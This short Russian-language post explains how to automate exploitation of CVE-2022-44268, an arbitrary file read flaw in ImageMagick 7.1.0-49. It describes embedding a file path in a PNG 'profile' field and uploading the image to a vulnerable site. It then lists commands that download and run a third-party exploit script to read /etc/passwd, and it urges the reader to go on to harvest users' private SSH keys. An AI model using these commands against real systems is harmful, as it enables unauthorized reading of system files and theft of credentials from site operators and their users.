
Автоматизация эксплуатации уязвимости CVE-2022-44268 в ImageMagick — произвольное чтение файлов

Автоматизация эксплуатации CVE-2022-44268 — произвольное чтение файлов в ImageMagick
Первоначальное исследование: https://www.metabaseq.com/imagemagick-zero-days/
Репозиторий PoC: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
ImageMagick интерпретирует текстовую строку «profile» как имя файла и загружает содержимое в качестве raw-профиля, после чего атакующий может скачать изменённое изображение, которое будет содержать содержимое удалённого файла.
🔴 Возьмите PNG-файл, добавьте путь к файлу в EXIF-поле «profile», отправьте его на сайт, использующий уязвимую версию ImageMagick; он интерпретирует путь к файлу, загружает его содержимое в EXIF-поле, вы скачиваете изображение, извлекаете HEX-данные из поля «Raw Profile Type» и конвертируете их в ASCII, чтобы прочитать удалённый файл.
Затронутые версии: ImageMagick 7.1.0-49
sudo apt install pngcrush imagemagick exiftool exiv2 -y
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <image name> <file to read>
./auto-cve-2022-44268.sh flag.png /etc/passwd
Как только вы получите пользователей из /etc/passwd, попробуйте перечислить приватные SSH-ключи из /home/.ssh//:
Не забывайте:
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268